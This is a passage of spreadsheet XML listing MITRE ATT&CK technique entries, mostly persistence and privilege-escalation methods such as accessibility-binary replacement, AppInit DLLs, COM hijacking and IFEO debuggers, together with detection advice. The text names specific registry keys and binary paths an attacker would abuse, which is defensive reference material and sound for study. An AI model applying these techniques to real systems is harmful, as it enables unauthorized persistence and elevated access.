    <t>Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)
Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/002</t>
  </si>
  <si>
    <t>T1611</t>
  </si>
  <si>
    <t>Escape to Host</t>
  </si>
  <si>
    <t>Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, and utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1611</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. Additionally, monitor for unexpected usage of syscalls such as &lt;code&gt;mount&lt;/code&gt; (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.</t>
  </si>
  <si>
    <t>Containers, Linux, Windows</t>
  </si>
  <si>
    <t>Container: Container Creation, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; David Fiser, @anu4is, Trend Micro; Idan Frimark, Cisco; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1585.002</t>
  </si>
  <si>
    <t>Establish Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/002</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Establish Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. 
Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/001</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. 
Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)
Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546</t>
  </si>
  <si>
    <t>22 January 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. 
These mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. 
Monitor for processes, API/System calls, and other common ways of manipulating these event repositories. 
Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process.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 </t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, WMI: WMI Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.008</t>
  </si>
  <si>
    <t>Event Triggered Execution: Accessibility Features</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/008</t>
  </si>
  <si>
    <t>Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Paul Speulstra, AECOM Global Security Operations Center</t>
  </si>
  <si>
    <t>T1546.009</t>
  </si>
  <si>
    <t>Event Triggered Execution: AppCert DLLs</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppCertDLLs&lt;/code&gt; Registry key under &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;, or &lt;code&gt;WinExec&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/009</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) 
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)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</si>
  <si>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T1546.010</t>
  </si>
  <si>
    <t>Event Triggered Execution: AppInit DLLs</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppInit_DLLs&lt;/code&gt; value in the Registry keys &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; or &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)
Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. 
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/010</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) 
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.</t>
  </si>
  <si>
    <t>T1546.011</t>
  </si>
  <si>
    <t>Event Triggered Execution: Application Shimming</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)
Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. 
A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/011</t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
* Shim-Process-Scanner - checks memory of every running process for any shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>Event Triggered Execution: Change Default File Association</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under &lt;code&gt;HKEY_CLASSES_ROOT\.[extension]&lt;/code&gt;, for example &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. The entries point to a handler for that extension located at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]&lt;/code&gt;. The various commands are then listed as subkeys underneath the shell key at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]\shell\[action]\command&lt;/code&gt;. For example: 
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/001</t>
  </si>
  <si>
    <t>Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.
User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user's preference will occur under this entry's subkeys.
Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Administrator, SYSTEM, User</t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>Event Triggered Execution: Component Object Model Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/015</t>
  </si>
  <si>
    <t xml:space="preserve">There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\Software\Classes\CLSID\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.  
Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. </t>
  </si>
  <si>
    <t>Elastic</t>
  </si>
  <si>
    <t>T1546.014</t>
  </si>
  <si>
    <t>Event Triggered Execution: Emond</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at &lt;code&gt;/sbin/emond&lt;/code&gt; will load any rules from the &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/014</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Ivan Sinyakov</t>
  </si>
  <si>
    <t>T1546.012</t>
  </si>
  <si>
    <t>Event Triggered Execution: Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., &lt;code&gt;C:\dbg\ntsd.exe -g  notepad.exe&lt;/code&gt;). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as &lt;code&gt;Debugger&lt;/code&gt; values in the Registry under &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; where &lt;code&gt;&amp;lt;executable&amp;gt;&lt;/code&gt; is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/012</t>
  </si>
  <si>
    <t>Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>T1546.006</t>
  </si>
  <si>
    <t>Event Triggered Execution: LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/006</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>Event Triggered Execution: Netsh Helper DLL</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/007</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t>Event Triggered Execution: PowerShell Profile</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (&lt;code&gt;profile.ps1&lt;/code&gt;) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) 
Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the &lt;code&gt;-NoProfile&lt;/code&gt; flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) 
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
